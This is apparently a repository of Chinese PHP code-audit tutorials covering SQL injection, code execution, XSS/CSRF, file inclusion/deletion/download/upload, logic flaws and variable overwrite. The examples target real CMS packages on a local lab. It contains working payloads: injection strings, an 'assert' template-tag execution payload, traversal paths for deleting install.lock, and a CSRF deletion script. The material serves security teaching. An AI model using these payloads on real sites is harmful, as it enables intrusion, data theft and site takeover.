├── 1.1.初识代码审计.md
├── 1.2.SQL注入审计.md
├── 1.3.代码执行审计.md
├── 1.4.XSS与CSRF审计.md
├── 1.5.文件操作审计.md
├── 1.6.逻辑漏洞审计.md
├── 1.7.函数或弱类型的缺陷和特性.md
├── 1.8.变量覆盖审计.md
├── 1.9.反序列化审计.md
├── 2.0通读全文审计.md
├── 2.1过滤逻辑错误审计.md
├── README.md
├── img
├── 1.2.1.png
├── 1.2.2.png
├── 1.2.3.png
├── 1.2.4.png
├── 1.2.5.png
├── 1.2.6.png
├── 1.2.7.png
├── 1.3.1.png
├── 1.3.2.png
├── 1.3.3.png
├── 1.3.4.png
├── 1.3.5.png
├── 1.4.1.png
├── 1.4.2.png
├── 1.4.3.png
├── 1.4.4.png
├── 1.4.5.png
├── 1.4.6.png
├── 1.4.7.png
├── 1.5.1.png
├── 1.5.10.png
├── 1.5.11.png
├── 1.5.12.png
├── 1.5.13.png
├── 1.5.14.png
├── 1.5.15.png
├── 1.5.16.png
├── 1.5.17.png
├── 1.5.2.png
├── 1.5.3.png
├── 1.5.4.png
├── 1.5.5.png
├── 1.5.6.png
├── 1.5.7.png
├── 1.5.8.png
├── 1.5.9.png
├── 1.6.1.png
├── 1.6.2.png
├── 1.6.3.png
├── 1.6.4.png
├── 1.6.5.png
├── 1.6.6.png
├── 1.6.7.png
├── 1.7.1.png
├── 1.7.2.png
├── 1.7.3.png
├── 1.7.4.png
├── 1.7.5.png
├── 1.7.6.png
├── 1.8.1.png
├── 1.8.2.png
├── 1.8.3.png
├── 1.8.4.png
├── 1.8.5.png
├── 1.8.6.png
├── 1.8.7.png
├── 1.8.8.png
├── 1.9.1.png
├── 1.9.10.png
├── 1.9.11.png
├── 1.9.12.png
├── 1.9.2.png
├── 1.9.3.png
├── 1.9.4.png
├── 1.9.5.png
├── 1.9.6.png
├── 1.9.7.png
├── 1.9.8.png
├── 1.9.9.png
├── 2.0.0.png
├── 2.0.1.png
├── 2.0.2.png
├── 2.0.3.png
├── 2.0.4.png
├── 2.0.5.png
├── 2.0.6.png
├── 2.0.7.png
├── 2.0.8.png
├── 2.1.0.png
└── 2.1.1.png
└── 代码
├── ECTouch_v2.7.0_SC_UTF8.zip
├── Ear_Music_20180820_UTF8.zip
├── MetInfo5.1.4.zip
├── ShopsN_Web_2.3.2.zip
├── Simple-Log-a5.zip.zip
├── typecho.tar.gz
├── zzzphp.zip
└── 熊海CMS_V1.0.rar
/1.1.初识代码审计.md:
--------------------------------------------------------------------------------
1 | # 0x00 简介
2 |
3 | 终于来到了代码审计篇章。希望看了朋友有所收获,我们通常把代码审计分为黑盒和白盒,我们一般结合起来用。
4 |
5 | 通常我们白盒审计有多种方法我们可以归纳为:
6 |
7 | 1.通读全文
8 |
9 | 2.回溯
10 |
11 | 其中通读全文费时间,但是有利于代码审计的经验积累,也能更深入的挖掘一些难以发现的漏洞。功能回溯我们可以定向的审计一些功能和函数,最常见的就是对命令执行函数的回溯,和上传等功能的审计。通过熟悉白盒审计有利于漏洞的发掘,因为代码审计和开发都能熟悉到程序中那些地方会存在对数据库的操作和功能函数的调用,举个简单的例子当我们看到download的时候,我们就会想到是不是有任意文件下载。
12 |
13 | # 0x01 环境与工具
14 |
15 | 我们在代码审计中又可以分为静态和动态,静态我们通常用于无法搭建原来的环境只能看代码逻辑来判断是否存在漏洞,而动态调试就可以debug、输出、监控SQL语句来看非常方便。
16 |
17 | 接下来代码审计工具基本就用到Sublime Text 3、VSCode、Seay源代码审计系统、PHPStorm+XDebug、文件对比、MYSQL监控、编码转换、正则调试等。其中文件对比工具可以拿来和更新补丁后的文件进行对于对比定位漏洞代码区,PHPStorm+XDebug可以动态调试定位漏洞成因,也有利于漏洞的发掘。当然你也可以用那些自动化审计的,貌似还支持代码回溯,还是能审计到一些漏洞的。环境能用基本就用phpstudy了。
18 |
19 | # 0x02 知识准备
20 |
21 | 代码审计我们需要对php有一定的了解,当然是越深入越好,我们也不纠结,代码审计需不需要精通php什么的,只能说知识面在什么层次就能审计到什么层次的漏洞,但是至少你得看得懂代码。
22 |
23 | 我们应该具备一些知识:
24 |
25 | 1.基本的正则
26 |
27 | 2.数据库的一些语法(这个我在前面的数据库维基已经讲的差不多了)
28 |
29 | 3.至少你得看懂php代码
30 |
31 | 4.php配置文件以及常见函数
32 |
33 |
34 | # 0x03 关于文章的一些问题
35 |
36 | 前面我们的实验环境我基本上不会使用框架类的,我尽量使用一些很普通的网站,还有如何用phpstudy之类的来本地搭建网站这些我也不会讲,这些基础的问题搜索一下就有,不能独立解决问题怎么能进步,遇到一些特殊的问题我还是会说一下的。
37 |
38 | # 0x04 文末
39 |
40 | 当然如果你跟我一样是一个新手才入门代码审计,看这篇文章最好不过了,因为我会讲的很细,当然我可能很多东西也讲不到,还请大家多看看别人的审计思路,只有不断的学习才有提高。
--------------------------------------------------------------------------------
/1.2.SQL注入审计.md:
--------------------------------------------------------------------------------
1 |
2 | # 0x00 简介
3 |
4 | 为什么第一章我们学习,因为看这篇文章的朋友大概也看过我前面写的MySQL_wiki系列,这里来SQL注入的话我们能方便理解,同时sql注入也是审计中我们经常想要找到的,比较以来就getshell什么的也不现实这种漏洞也不多。
5 |
6 | # 0x01 字符型注入
7 |
8 | 这里我们看到sqli-libs第一关的代码
9 |
10 | ```
11 | ";
31 | echo 'Your Login name:'. $row['username'];
32 | echo "
";
33 | echo 'Your Password:' .$row['password'];
34 | echo "";
35 | }
36 | else
37 | {
38 | echo '';
39 | print_r(mysql_error());
40 | echo "";
41 | }
42 | }
43 | else { echo "Please input the ID as parameter with numeric value";}
44 | ?>
45 |
46 | ```
47 | 我们可以看到调用`$_GET['id']`获取参数内容,没有经过任何过来带入了SQL语句的查询,也就是代码没有任何过来且没开魔术引号,那么将会形成注入,如果开启魔术引号遇到数字型的我们还是能够注入的,因为`magic_quotes_gpc`只会转义单引号、双引号、反斜线、NULL,但是数字型注入我们可以不试用到这些。
48 |
49 | ```
50 | http://127.0.0.1/sqli/Less-1/?id=-1%27union%20select%201,user(),3--%20+
51 |
52 | ```
53 |
54 | # 0x02 编码类注入
55 |
56 | 有些为了业务需要他会把传入一些编码后的参数再解码带入数据库查询,我们常见的有base64编码,也有的程序会内置url解码,这类写法通常见于框架。
57 |
58 | 1.base64
59 |
60 | ```
61 | ";
70 | echo "用户名:".$row['username']."
";
71 | echo "密码:".$row['password']."
";
72 | }else{
73 | print_r(mysql_error());
74 | }
75 | echo '
';
76 | echo "查询的语句是:$sql";
77 | ?>
78 |
79 | ```
80 | 传入的值base64解密后带入查询,这种注入魔术引号是没办法拦截的,当我们遇到网站为base64编码的参数时可以留意下。
81 |
82 | ```
83 | http://127.0.0.1/sqli/Less-1/base64.php?id=JyB1bmlvbiBzZWxlY3QgMSx1c2VyKCksMyAtLSAr
84 |
85 | ```
86 | 2.urldecode
87 |
88 | ```
89 | ";
98 | echo "用户名:".$row['username']."
";
99 | echo "密码:".$row['password']."
";
100 | }else{
101 | print_r(mysql_error());
102 | }
103 | echo '
';
104 | echo "查询的语句是:$sql";
105 | ?>
106 |
107 | ```
108 | 因为接受的参数只会被url解码一次,传入的值不是魔术引号认识的值所以可以绕过
109 |
110 | ```
111 | http://127.0.0.1/sqli/Less-1/base64.php?id=%2527union%20select%201,user(),3--%20+
112 |
113 | ```
114 |
115 | # 0x03 宽字节注入
116 |
117 | ```
118 | ";
129 | echo "用户名:".$row['username']."
";
130 | echo "密码:".$row['password']."
";
131 | }else{
132 | print_r(mysql_error());
133 | }
134 | echo '
';
135 | echo "查询的语句是:$sql";
136 | ?>
137 |
138 | ```
139 | 网上有很多解释大家可以搜索一下我这里就不详细介绍了大概原因就是:
140 |
141 | id=1'->id=1\'->id=1%5c%27
142 |
143 | id=1%df'->id=1%df%5c%27->id=1%DF5C%27->id=1運'
144 |
145 |
146 | 当然还有其他各种类型的注入这里就不一一列举了,看了mysql系列文章的大概都知道,不知道的可以看看。
147 |
148 | # 0x04 过滤
149 |
150 | 通常情况下一个成熟的cms是不存在不过滤的情况,一般的程序选择用函数来过滤比如`addslashes()`,也可以开启魔术引号,但是更多的程序它采用正则匹配来过滤,
151 | 使用不正确的匹配替换方式反而导致被绕过的机会更大,比如有的程序把`union` 替换为空,那么我们就可以双写`ununionion`绕过从而还可能绕过外部WAF,对于整数型一般采用`intval()`等字符转换,后期通过实战一步一步讲解。
152 |
153 | # 0x05 实战审计
154 |
155 | 找了半天源码,还是用这款熊海CMS V1.0吧,这款CMS感觉不错,什么洞都有,非常适合我们学习审计,同时审计这个cms的文章很多,大家如果觉得我写的不如人意,还能看看别人。
156 |
157 | 首先我们审计对传入的参数如果想快速的看是否有全局过滤,不妨找个文件输出一下`$_POST`、`$_GET`等等。
158 |
159 | ```
160 | echo $_POST['b'];
161 | echo $_GET['a'];
162 |
163 | ```
164 |
165 | 
166 |
167 | 没有全局过滤 我们来到后台登陆文件admin/files/login.php 看看login.php一般登陆存在注入的可能性还是很大的
168 |
169 | 
170 |
171 | 很明显 带入查询的user没有经过任何过滤,同时输出了错误,所以可以用报错查询,当然你也选择万能密码。
172 |
173 | payload:
174 |
175 | ```
176 | user=1111' and (updatexml(1,concat(0x7e,(select user()),0x7e),1))-- +&password=111&login=yes
177 |
178 | ```
179 |
180 | 
181 |
182 | 在看看留言板 files/submit.php
183 |
184 | 
185 |
186 | 传入参数没有过滤
187 |
188 | 
189 |
190 | 同时插入的时候,这里使用了`mysql_error()`所以可以用报错注入,否则只能使用盲注了。
191 |
192 | 
193 |
194 | payload:
195 |
196 | ```
197 | cid=0&name='or updatexml(1,concat(0x7e,(version())),0) or'&mail=1111&url=http%3A%2F%2F1&content=%E9%98%BF%E5%BE%B7&save=%E6%8F%90%E4%BA%A4&randcode=&jz=1&tz=1
198 | ```
199 |
200 | 开始我们说过不是使用了过滤函数就万事大吉了,数字型注入可以不使用引号
201 |
202 | 
203 |
204 | 我们看到传入的`cid`已经被`addslashes()`函数转义了,查询的地方都没啥问题,但是到浏览计数的时候调用了它,那么我们就可以使用盲注或者报错注入了,因为有错误回显。
205 |
206 | payload:
207 |
208 | ```
209 | http://127.0.0.1/xhcms/?r=content&cid=1%20and%20If(ascii(substr(database(),1,1))%3C10,0,sleep(10))
210 |
211 | ```
212 |
213 | 这个系统还有其他注入,想练手的自己下载审计一下,总体思路有用户交互的地方都有可能存在注入,这也是我们没有通读代码的一个审计思路。
214 |
215 |
--------------------------------------------------------------------------------
/1.3.代码执行审计.md:
--------------------------------------------------------------------------------
1 |
2 | # 0x00 简介
3 |
4 | 代码执行也是我们经常遇到的,通常是`eval()`、`assert()`,当然还有回调函数比如`call_user_func()` `array_map()`,正则函数,动态调用等等,因为程序对传入的参数过滤不严或者没有过滤,导致代码执行,看过我前面写的php的webshell总结的话,你就会发现很多知识是相辅相成的。
5 |
6 | # 0x01 代码执行
7 |
8 | 这里说说eval的命令执行,assert在php7后面移除了。我们来看一个简单的eval代码执行
9 |
10 | test.php
11 | ```
12 |
16 |
17 | ```
18 | payload:
19 |
20 | ```
21 | test.php?x=phpinfo();
22 |
23 | ```
24 | 简单到waf以为他是个webshell了,当然我们实际情况肯定遇不到这么简单的,可能需要多重组合利用,这里下面我以一个实例为例
25 |
26 |
27 | # 0x02 实战审计
28 |
29 | 这里使用的是zzzphp V1.6.0的一个解析标签过程中引发的代码执行,网上也有其他人的审计思路,这里我是帮朋友复现的时候弄的。
30 |
31 | 找个的审计思路是全局搜索eval,当然你也可以搜索其他的能够引发代码执行的函数,但是这个这-1里没有。
32 |
33 | 路径:\inc\zzz_template.php
34 |
35 | 
36 |
37 | 我们发现eval里面有变量,那么他是可能存在代码执行的
38 |
39 | 
40 |
41 | 大概看了下`parserIfLabel()` 函数没有什么过滤,能够达到我们传入任意参数的目的,到了这里我们就是回溯那里调用了这个函数呗,全局搜索下`parserIfLabel()`,没搜索到,看了下是个类,所以搜索类名`ParserTemplate`。
42 |
43 | 
44 |
45 | 既然 \admin\save.php 调用了我们这个,不妨看看后台那里有模板操作这个
46 |
47 | 
48 |
49 | 当然完全你也可以回溯代码去分析,但是既然有源码能看就看。
50 |
51 | 
52 |
53 | 随便找个文件放入我们遵循他正则的代码即可,不过一般我们测试的过程中,尽量选择对目标影响小的文件。
54 |
55 | payload:
56 |
57 | ```
58 | {if:assert(phpinfo())}x{end if}
59 |
60 | ```
61 | 于此同类的还有苹果cms8.x,都是在解析标签过程中出现的问题,一般看到可以自定义解析标签那么就值得注意,命令执行与此类似,这里就不说了。
--------------------------------------------------------------------------------
/1.4.XSS与CSRF审计.md:
--------------------------------------------------------------------------------
1 | # 0x00 XSS简介
2 |
3 | XSS分为反射型和储存型,一般来说反射型的用处不是很大利用难度相对较高,存储型XSS一般常见于发布评论、留言、收获地址、个人信息等等。对于xss的审计我们一般就在这些点找,有用户控制输入信息输出的地方都是它出现的地方,很多网站的突破口可能就是一个XSS。
4 |
5 |
6 | # 0x01 XSS实战审计
7 |
8 | 这次选用的CMS还是熊海,我们通过搭建环境查看输入的地方来审计,学习下高效率审计方式。
9 |
10 | 
11 |
12 | 随意留言抓包看看他请求的url再去找相对的文件`/?r=submit&type=message` 当然你还是得看看他是怎么调用文件的,这里就是加载submit文件中的message方法。
13 |
14 | 我们来到 files/submit.php
15 |
16 | 
17 |
18 | 前面的输入基本都没过过滤,到了最后一步`$content`被 `addslashes(strip_tags($content));`过滤,所以我们XSS其他地方即可,看到这里我们在挖洞的过程中所以不要纠结一点。
19 |
20 | 
21 |
22 | 一般过滤xss的函数还有`htmlspecialchars`,我们审计他的注意点就是查看一些输出函数print、print_r、echo、printf、die、var_dump、var_export。
23 |
24 | # 0x02 Csrf
25 |
26 | CSRF(Cross-site request forgery),中文名称:跨站请求伪造,也被称为:one click attack/session riding,缩写为:CSRF/XSRF。
27 | CSRF实际上就是利用你的身份去发送恶意请求,我们需要知道CSRF分为GET型提交的和POST,前者危害更大,后者一般可以寻找XSS来配合我们。GET型的比如一个链接 http://www.404.com/1.php?id=1 访问即可删除账号,然后你在论坛发帖构造
28 | `
` 那么访问这个帖子的人账号都将会删除,POST的见下文,造成CSRF的原因就是没有使用token或者验证其他值,审计就看页面有没有token、referer验证,验证是否可以绕过,不过我推荐还是先黑盒,看看有没有token,删除了referer是否能够访问,再结合代码来看。
29 |
30 |
31 | 我们来看到zzzphp的后台,他是没有token的,同时我们前面审计到了他的代码执行,配合这个csrf就可以直接getshell。
32 |
33 | 
34 |
35 | 如果你不会自己写这个代码,不妨使用burp生成一个测试页面,右键选择即可。
36 |
37 | 
38 |
39 | 这是个需要点击的表单,你可以加一段JavaScript代码来自动提交。
40 |
41 | ```
42 |
43 |
44 | ```
45 |
46 | # 0x03 组合利用
47 |
48 | 这里只是个简单的组合,由于没找到具体实验环境我只有简单的演示一下(懒)
49 | 本次选妃zzzphp,由于他后台没有的xss,我只能登陆后台后查看前台了。
50 |
51 | 1.构造CSRF表单自动提交
52 | payload:
53 | ```
54 |
55 |
56 |
57 | //burp生成的表单
58 |
59 |
60 |
61 |
62 |
63 | ```
64 |
65 | 2.插入iframe标签
66 |
67 | payload:
68 |
69 | ```
70 |
71 | ```
72 | 还可以使用XMLHTTPRequest发送POST、GET,按情况选择,这里把payload插入手机号码。
73 |
74 | 
75 |
76 | 用登陆了后台后访问页面,可以看到显示修改成功。
77 |
78 | 由于没找到想要的源码我简单介绍下利用XMLHTTPRequest来发包,漏洞程序还是熊海cms删除一友情链接
79 |
80 | payload 1.js:
81 |
82 | ```
83 | function del() {
84 | var xhr = new XMLHttpRequest();
85 | xhr.open('GET','/xiong/admin/?r=linklist&delete=6');
86 | xhr.send(null);
87 | }
88 | del();
89 |
90 | ```
91 | payload:
92 |
93 | ```
94 |
95 |
96 | ```
97 | 查看留言板可以看到我们的XMLHTTPRequest已经发包了
98 |
99 | 
100 |
101 | 比较典型的例子可以看看 https://xz.aliyun.com/t/3177
--------------------------------------------------------------------------------
/1.5.文件操作审计.md:
--------------------------------------------------------------------------------
1 | # 0x00 文件包含
2 |
3 | ### 本地包含
4 |
5 | 本地文件包含(Local File Include)简称 LFI,文件包含在php中,一般涉及到的危险函数有`include()`、`include_once()`、`require()`、`require_once()`,在包含文件名中存在可控变量的话就可能存在包含漏洞,由于这几个函数的特性也可能产生其他漏洞,后面一一讲到。
6 |
7 | 示例:
8 |
9 | ```
10 |
14 |
15 | ```
16 | payload:
17 |
18 | ```
19 | http://127.0.0.1/test.php?name=D:\phpstudy\PHPTutorial\MySQL\my.ini
20 |
21 | ```
22 | 这是个最简单的文件包含,没有任何过滤。但是一般程序不会这么写,一般会指定后缀,这样我们就需要截断来绕过了。
23 |
24 | ```
25 |
29 |
30 | ```
31 | 在PHP5.2.x中我们可以通过使用%00来截断后面的内容、也可以使用路径长度截断,不过都在php5.3中被修复了。
32 |
33 | payload:
34 |
35 | ```
36 | http://127.0.0.1/test.php?name=D:\phpstudy\PHPTutorial\MySQL\my.ini%00
37 |
38 | ```
39 |
40 | 
41 |
42 | 利用字符.或者/.或者./来截断。系统文件路径长度限制:windows 259个byteslinux 4096个bytes。
43 |
44 | ### 远程包含
45 |
46 | 远程文件包含漏洞(Remote File Inclusion)简称RFI,他需要我们的php.ini中配置`allow_url_include`、 `allow_url_fopen`。
47 |
48 | 1.包含远程文件
49 |
50 | 需要打开`allow_url_include=On`、 `allow_url_fopen = On`
51 |
52 | 
53 |
54 | 他可以利用?号截断,不受版本限制
55 |
56 | payload:
57 |
58 | ```
59 | http://127.0.0.1/test.php?name=http://127.0.0.1/1.txt?
60 |
61 | ```
62 |
63 | 2.伪协议
64 |
65 | ```
66 | file:// — 访问本地文件系统
67 | http:// — 访问 HTTP(s) 网址
68 | ftp:// — 访问 FTP(s) URLs
69 | php:// — 访问各个输入/输出流(I/O streams)
70 | zlib:// — 压缩流
71 | data:// — 数据(RFC 2397)
72 | glob:// — 查找匹配的文件路径模式
73 | phar:// — PHP 归档
74 | ssh2:// — Secure Shell 2
75 | rar:// — RAR
76 | ogg:// — 音频流
77 | expect:// — 处理交互式的流
78 |
79 | ```
80 | 各种伪协议的使用方法网上很多,大家搜索一下吧。
81 |
82 |
83 |
84 | ### 实战审计
85 |
86 | 直接看主页index.php
87 |
88 | ```
89 |
96 |
97 | ```
98 | 他会包含files目录下的文件,因为他没有过滤../所以可以包含任意目录下的文件,由于加了后缀所以漏洞存在于低版本php。
99 |
100 | 
101 |
102 |
103 | # 0x01 任意文件删除
104 |
105 | 任意文件删除审计一般来说我们都是搜索函数`unlink` 然后回溯去看。
106 |
107 | inc\zzz_file.php
108 |
109 | 
110 |
111 | 首先判断传入的参数是否为空,然后拼接路径,第516行中出现了一个函数`ifstrin`,我们跟进看看
112 |
113 | 
114 |
115 | 只是个简单的判断没啥特殊情况,我们再来看看拿来调用了这个文件。
116 |
117 | 
118 |
119 |
120 | ```
121 | function file_path( $path ) {
122 | $list=array();
123 | $path= substr( $path, 0, strrpos( $path, '/' ));
124 | $list=splits($path,'/');
125 | return $list;
126 | }
127 |
128 | function arr_search($arr1, $arr2 ) {
129 | $result=false;
130 | foreach ( $arr1 as $v ) {
131 | if(in_array( $v,$arr2 )) return true;
132 | }
133 | return $result;
134 | }
135 |
136 | ```
137 | 获取参数,然后看看我们传入的路径是否存在这个数组里面的值,也就是基本上是没有过滤的,因为我们完全可以通过../ 跳回去。
138 |
139 | payload:
140 |
141 | ```
142 | POST /zzzp6p/admin/save.php?act=delfile
143 |
144 | path=/zzzp6p/upload/../install/1install.lock
145 |
146 | ```
147 | 这里我们走的下面的分支不能删除 `array( 'php', 'db', 'mdb', 'tpl' )` 这个数组的文件。
148 |
149 | 要删除任意文件只需要使用
150 |
151 | ```
152 | path=/zzzp6p/runtime/../install/1.db
153 |
154 | ```
155 | 让`ifstrin()`为true走上面的分支即可。
156 |
157 | 一般来说我们任意文件删除 是配合删除install.lock来达到网站重装漏洞。
158 |
159 |
160 | # 0x02 任意文件下载
161 |
162 | 任意文件下载常见于文件的显示和下载的地方,一般关注的文件是和下载有关的,比如download。当然你还可以搭建源码,来寻找能够下载的地方。
163 |
164 | 常见的下载或读取函数: `file_get_contents()`、`readfile()` 、`fopen()`
165 |
166 | 在网上找到个别人审计的实例,结合起来审计一下,用到的源码是Ear_Music_20180820_UTF8
167 |
168 | 搜索down相关的词语,找到文件\template\default\source\down.php
169 |
170 | 
171 |
172 | 我们看看`$file`参数怎么来的,先是调用函数`getfield()`,转到函数去看看
173 |
174 | 
175 |
176 | 不出意外应该是从数据库中读取路径,再来看看`geturl()`函数
177 |
178 | 
179 |
180 | 构造下载地址,这些地方没什么问题,我们来看看什么地方对储存地址的表中插入了数据,搜索表名`lyric`。
181 |
182 | \source\user\music\ajax.php
183 |
184 | 
185 |
186 | 我们看到`$lyric`经过 `checkrename`、 `SafeRequest`这两个函数的清洗,先来转到函数`SafeRequest`。
187 |
188 | 
189 |
190 | 我们传入的mode是get,然后经过`addslashes()`的转义,下面在替换为空,也就是我们基本上是不能使用`\\`了,我们在看看`checkrename`
191 |
192 | 
193 |
194 | 这里正则匹配了我们的
195 |
196 | ```
197 | .\
198 | ?iframe=
199 | .php?
200 |
201 | ```
202 | 这里完全看不懂他匹配后缀为php?这个的意义何在,直接php就绕过了。
203 |
204 | 所以综合起来就是不要带有`\ 和 ./` 这里我们只要传入绝对路径就可以了
205 |
206 | 登陆前台找到上传歌曲的页面在歌词地址中插入payload
207 |
208 | payload:
209 |
210 | ```
211 | D:/phpstudy/PHPTutorial/WWW/Ear_Music/template/default/source/down.php
212 |
213 | ```
214 |
215 |
216 | 
217 |
218 |
219 | # 0x03 文件上传
220 |
221 | 文件上传只有一个函数 `move_uploaded_file()` 一般来说,我们就可以搜索这个函数来回溯,看他的验证方式,是黑名单还是白名单,是否是前端限制,是否只是简单的验证了文件头,是否是能绕过的正则匹配,是否渲染了图片。
222 |
223 | 结合zzzphp来审计一下文件上传,全局搜索`move_uploaded_file`
224 |
225 | \zzzcms\inc\zzz_file.php
226 |
227 |
228 | 
229 |
230 | 回溯看看那里调用了这个函数
231 |
232 | 
233 |
234 | 典型的黑名单验证,可以使用asa绕过,只需要在后台添加这个扩展名
235 |
236 | 
237 |
238 | 上传即可,当然也可以通过上图中的 switch分支,只要传入的 type不是他的类型就可以跳过后台添加这个步骤,
239 |
240 | 
241 |
242 |
243 | # 0x04 文末
244 |
245 | 对文件的操作还见于写入其他配置文件,典型的有thinkphp缓存文件写入。
--------------------------------------------------------------------------------
/1.6.逻辑漏洞审计.md:
--------------------------------------------------------------------------------
1 | # 0x00 简介
2 |
3 | 逻辑漏洞是指由于程序逻辑不严,或者函数使用不当,导致发生越权访问,cookies绕过,越权密码修改,重复安装等等问题。一般逻辑漏洞的挖掘需要对代码有一定阅读能力。
4 |
5 |
6 | # 0x01 越权
7 |
8 | 越权一般是对cookies的验证不严或者没有验证,一般我们审计后台发现某个功能没有包含验证文件,那么很有可能发生越权操作,当然越权有很多不仅仅局限于一个后台访问的问题。在众多大型网站越权问题也时常发生的,这也是漏洞挖掘中大家都比较喜欢的,有些越权在黑盒测试中或许更加容易发现,所以代码审计大家灵活运用,不要局限了你的思路。越权是个大的专题,我应该是讲不了多少还是请大家多看看文章。
9 |
10 |
11 |
12 | 1.**后台越权**:后台某些页面没有引入验证文件
13 |
14 | 
15 |
16 | 比如这里熊海cms如果我们删除这个验证,那么就可以直接访问这个页面,有很多程序员他会忘记每个页面都添加。
17 |
18 | 2.**水平越权**:一个用户尝试访问与他拥有相同权限的用户的资源,比如删除收获地址处没有验证权限,导致越权删除其他人的地址。
19 |
20 | 我们用zzzcms这个程序来做演示 zzzcms\form\index.php
21 |
22 | 
23 |
24 | 他这里是edituser是没有越权的,我这里只是讲解一下,简单的介绍一下越权如何去审计。我们看这个代码他最后update的时候是修改我们的uid现对的值,而我们的uid是POST包获取的,也就是如果我们可控uid那么就能越权修改其他人的资料。
25 | 但是这里有一条验证`$uid != get_session( 'uid' )and back( '很抱歉,资料修改失败' );` 所以没办法越权,为了演示我们可以删除了来看看。
26 |
27 |
28 | 
29 |
30 | 成功把UID为1的用户的资料修改了。
31 |
32 | 3.**垂直越权**:一个低级用户尝试访问高级别用户的功能。
33 |
34 |
35 |
36 | # 0x02 cookies验证不严
37 |
38 | 这里用到熊海CMS,我们随便点击一个后台页面,前面包含了一个验证文件`require '../inc/checklogin.php';` 来看看这个文件
39 |
40 | 
41 |
42 | 判断我们的cookies里面user是否为空,不为空就可以访问后台了。
43 |
44 | 
45 |
46 |
47 | # 0x03 安装程序逻辑问题
48 |
49 | 这里找了半天源码发现红日安全写过一个Simple-Log1.6这里就用他这个源码了。
50 |
51 | 
52 |
53 | 这里他判断是否安装了,然后就直接跳转到主页,而程序没有退出,那么后面的依然可以执行,也就是说直接post后面的程序即可安装。
54 |
55 | 
56 |
57 | 这类没有正确退出的造成的漏洞还是蛮多的,在后台等地方可以好好关注一下。
58 |
59 | # 0x04 文末
60 |
61 | 当然逻辑漏洞不止就这些,还有其他的问题比如验证码逻辑的绕过,函数的缺陷,推荐大家多看看别人的审计文章。
62 |
63 |
--------------------------------------------------------------------------------
/1.7.函数或弱类型的缺陷和特性.md:
--------------------------------------------------------------------------------
1 | # 0x00 in_array()
2 |
3 | `in_array(search,array,type)` 如果给定的值 search 存在于数组 array 中则返回 true。如果第三个参数设置为 true,函数只有在元素存在于数组中且数据类型与给定值相同时才返回 true。如果没有在数组中找到参数,函数返回 false。
4 |
5 | 那么为什么会出现安全问题呢,我们来看看下面代码
6 |
7 | 
8 |
9 | 在没设置第三个参数的情况下`in_array()`函数将会吧`1 and 1=1`转为数字1比较,那么这样就造成了一些安全问题,在注入或上传的情况下可能绕过。
10 |
11 |
12 | # 0x01 is_number()
13 |
14 | `is_number()` 函数他会判断变量是否为数字或者数字字符串,假如我们传入的字符串为16进制,那么他也是认定为数字的。
15 |
16 | 
17 |
18 | 我们知道我们向mysql插入数据的时候是可以是16进制的,他取出来就会还原成原始字符串,这样用`is_number()` 函数检测后肯能就会存在二次注入。
19 |
20 |
21 | # 0x02 PHP弱类型的特性
22 |
23 | php是一款弱类型语言,他在使用==比较字符串的时候会把字符串类型转化成相同的再比较,那么这样也会造成一些问题.
24 |
25 | 
26 |
27 | 他能遇到字符串的0e,0x就会解析成对应的科学计数和16进制。
28 |
29 |
30 | # 0x03 switch()
31 |
32 | case是数字类型时,switch会把参数转换为int类型
33 |
34 | 
35 |
36 |
37 |
38 |
39 | # 0x04 strcmp()
40 |
41 | 比较函数如果两者相等返回0,string1>string2返回>0 反之小于0。在5.3及以后的php版本中,当strcmp()括号内是一个数组与字符串比较时,也会返回0。
42 |
43 | 
44 |
45 |
46 | # 0x05 preg_match()
47 |
48 | 如果在进行正则表达式匹配的时候,没有限制字符串的开始和结束(^ 和 $),则可以存在绕过的问题。
49 |
50 |
51 | 
52 |
53 |
54 | # 0x06 文末
55 |
56 | 当然还有反序列化、变量覆盖等等,这里就不全部写了,我会单独拿出来写,还有一些函数的特性留给大家自行搜索。
57 |
58 |
59 |
--------------------------------------------------------------------------------
/1.8.变量覆盖审计.md:
--------------------------------------------------------------------------------
1 | # 0x00 简介
2 |
3 | 变量覆盖,顾名思义就是可以覆盖已有变量值,导致变量覆盖的漏洞有:`extract()`、`parse_str()`、`import_request_variables()` 使用不当,或者使用了`$$`或者开启了全局变量注册。
4 |
5 | # 0x01 变量覆盖演示
6 |
7 | **extract()**
8 |
9 | `extract(array,extract_rules,prefix)`
10 | 函数从数组中将变量导入到当前的符号表,即将数组中的键值对注册成函数,使用数组键名作为变量名,使用数组键值作为变量值。
11 |
12 | 
13 |
14 | 可以看到我们初始变量值为a但是覆盖之后就变成了我们输入的值。
15 |
16 | **parse_str()**
17 |
18 | `parse_str() `函数用于把查询字符串解析到变量中,如果没有array 参数,则由该函数设置的变量将覆盖已存在的同名变量。在没有array参数的情况下使用此函数,并且在PHP 7.2中将废弃不设置参数的行为,此函数没有返回值。
19 |
20 | 
21 |
22 | **import_request_variables()**
23 |
24 | `import_request_variables ( string $types , string $prefix )`
25 | 将 GET/POST/Cookie 变量导入到全局作用域中, types 参数指定需要导入的变量, G代表GET,P代表POST,C代表COOKIE。此函数只能用于PHP4.1 ~ PHP5.4。
26 |
27 | 
28 |
29 | **$$**
30 |
31 | 典型的例子就是foreach来遍历数组中的值作为变量。
32 |
33 | 
34 |
35 | 其中`$_key`的值为a,那么 `$a`的值就被覆盖为2了。
36 |
37 |
38 | 还有全局注册register_globals这些,php配置默认都是关闭的。
39 |
40 |
41 | # 0x02 实战审计
42 |
43 | 本次用到的是MetInfo cms的变量覆盖漏洞,跟进主页来到核心配置文件
44 |
45 | \include\common.inc.php
46 |
47 | 
48 |
49 | 看到文件的24~28行,明显用到了我们上面说的&&变量覆盖的写法,不过这里他用到了`daddslashes()`防注入,不过并不影响我们这章讲的知识。
50 |
51 | 随便来到一个子文件看看他的加载方式\news\index.php
52 |
53 | 
54 |
55 | 第7行包含一个变量,那么这个变量在什么地方,我们跟进 include/module.php 看看,在本文件搜索`$module`变量。
56 |
57 | 
58 |
59 | 这里其实低版本的源码中没有这句话`$module = '';` 其中`$module`变量都在`$fmodule != 7 ` 这个if条件中,我给大家打包的是低版本,我安装错了。 也就是只要我们传入的`$fmodule`的值为7那么我们就可以覆盖这个`$module`的值
60 |
61 | 
62 |
63 | 只要上传一张图片或者其他文件就可以包含了,因为`require_once`的时候并没有判断他的后缀名。
64 |
65 | 在变量覆盖的时候一定要注意初始化的值和覆盖的顺序。
--------------------------------------------------------------------------------
/1.9.反序列化审计.md:
--------------------------------------------------------------------------------
1 | # 0x00 简介
2 |
